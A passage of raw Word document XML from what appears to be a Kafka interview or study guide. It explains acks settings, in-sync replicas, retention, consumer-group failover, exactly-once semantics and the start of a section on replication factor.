          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: No acknowledgment. The producer sends the message and doesn’t wait for any acknowledgment. This provides low latency but no guarantees of message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F0AF5" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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acks=1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for the leader broker to acknowledge that the message has been written to the partition. This provides some reliability, but if the leader crashes after acknowledgment and before replication to followers, messages can be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09640990" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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lastRenderedPageBreak/>
        <w:t>acks=all</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer waits for acknowledgment from all in-sync replicas (ISRs) before considering the message successfully written. This provides the highest level of durability and fault tolerance, as the message will be replicated to multiple brokers before acknowledgment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF8166" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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3. In-Sync Replicas (ISR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA406B5" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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uses the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-sync replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ISRs) to ensure that only the replicas that have successfully replicated the message are considered for leader election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA25A18" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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SRs</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each partition has a set of replicas (including the leader), but only those replicas that are caught up with the leader are considered "in-sync." If a follower falls behind the leader and doesn’t catch up in time, it is removed from the ISR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E672CCC" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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ata Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka will not allow a partition to have fewer than the minimum number of in-sync replicas (configured via min.insync.replicas). If a partition falls below this threshold, it will stop accepting writes, preventing data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E8565" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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4. Log Segment and Data Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC05421" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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ensures data reliability by storing messages in logs that are organized into segments. These log segments are immutable once written, which means that messages are not modified, guaranteeing data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036820B4" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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ata Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows you to configure retention policies (either by time or size). Data is retained for a specified duration or until the size of the log exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB3B08" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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mmutable Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once written, messages in Kafka are immutable, which means that the integrity of the data is preserved over time. Even if a broker crashes, the messages are still stored on other replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4911A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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5. Consumer Group Fault Tolerance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF5B34" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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consumer groups provide fault tolerance at the consumer level by ensuring that messages are consumed only once, even if a consumer crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA9BAD" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Group Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka ensures that each partition is consumed by exactly one consumer in a consumer group at any given time. If a consumer crashes, Kafka will rebalance the partitions and reassign them to other consumers in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5263281E" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135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Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka tracks the offset (the position) of each consumer in a consumer group. If a consumer crashes, it can resume consuming messages from the last committed offset after it restarts, ensuring no message loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4106F2CC" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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6. Failure Recovery and Fault Tolerance in Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D452A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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brokers can fail and recover without affecting the availability of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267339EC" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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eader Election</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the leader of a partition fails, Kafka will automatically elect a new leader from one of the in-sync replicas. This minimizes downtime and ensures continued availability of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81C829" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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roker Failure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka is designed to handle broker failures transparently. If a broker goes down, Kafka will continue serving data from other brokers, and when the failed broker comes back online, it will rejoin the cluster and catch up with the missing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E893ED" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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7. Idempotence and Exactly-Once Semantics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FCC6F" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that messages are neither lost nor processed multiple times due to failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D26FED" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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dempotent Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka 0.11 introduced idempotent producers, which ensure that messages are not duplicated even if the producer retries sending the same message due to network issues or broker failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CBA61" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka’s exactly-once semantics guarantee that a message will be delivered and processed exactly once, even in the case of failures. This is achieved by enabling idempotent producers and configuring the consumer to commit offsets only after successfully processing messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1526E891" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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8. Distributed Nature of Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4C78A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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s distributed nature itself provides fault tolerance. Data is distributed across multiple brokers, and each partition can be replicated across several brokers. This architecture allows Kafka to scale horizontally and handle failures in a distributed manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257A9D7" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00B45047">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Summary of Kafka's Fault Tolerance Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B5320" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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plication</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that multiple copies of data are stored across different brokers to provide high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B50F168" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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n-Sync Replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Guarantees that data is not lost by ensuring that only replicas that are fully caught up with the leader are considered for leadership and data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49FA38" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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Acks Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Offers different acknowledgment levels (such as acks=all) to control the durability of messages and ensure that they are safely replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60113592" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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Group Failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that Kafka consumers can continue consuming messages even if one of the consumers in the group crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F410C5E" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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lastRenderedPageBreak/>
        <w:t>Idempotent Producer and Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevents message duplication and ensures that messages are processed exactly once, even in the case of retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D841BF5" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="0003272F" w:rsidRDefault="00B45047" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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eader Election and Broker Failover</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that if a broker or leader partition fails, another broker or replica can take over, minimizing downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60316D7A" w14:textId="77777777" w:rsidR="00B45047" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45047" w:rsidP="00B45047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Together, these features enable Kafka to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high availability</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fault tolerance</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data consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, even in the event of network failures, broker crashes, or other faults in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000ADF8" w14:textId="57C7B380" w:rsidR="00412451" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00412451">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CF0AA73">
          <v:rect id="_x0000_i3160" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="099C0EF6" w14:textId="3E450252" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="784" w:name="_Toc196308264"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s replication mechanism and how data is replicated across brokers to prevent data loss</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="784"/>
    </w:p>
    <w:p w14:paraId="652DE418" w14:textId="2DFD3A38" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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s </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replication mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plays a crucial role in ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data availability</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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It prevents data loss by replicating data across multiple brokers, ensuring that even if a broker fails, the data is still available on other brokers. Here's an in-depth explanation of how this replication mechanism works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C946129" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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ey Concepts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53601FB6" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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artition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka divides each topic into partitions. Each partition is a log file, and each log entry is a message. The data within each partition is stored sequentially, and Kafka allows messages to be read and written in parallel from multiple partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD5D57" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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plicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: For fault tolerance, Kafka creates copies (replicas) of each partition and stores these replicas on different brokers. Each partition has a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader replica</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>follower replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE28C5F" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1"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1. Replication Factor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60301A70" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB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e replication factor determines how many copies of each partition Kafka should maintain across the cluster. For example, if the replication factor is 3, Kafka will maintain 3 copies (1 leader and 2 followers) of each partition on different brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30731354" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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plication Factor = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There’s no replication, and if the broker holding the partition fails, data is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B952C9" w14:textId="77777777" w:rsidR="004A4CB1" w:rsidRPr="0003272F" w:rsidRDefault="004A4CB1" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136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plication Factor &gt; 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data is replicated across multiple brokers, providing fault tolerance. If a broker fails, Kafka can still serve data from the replicas.</w:t>
      </w:r>
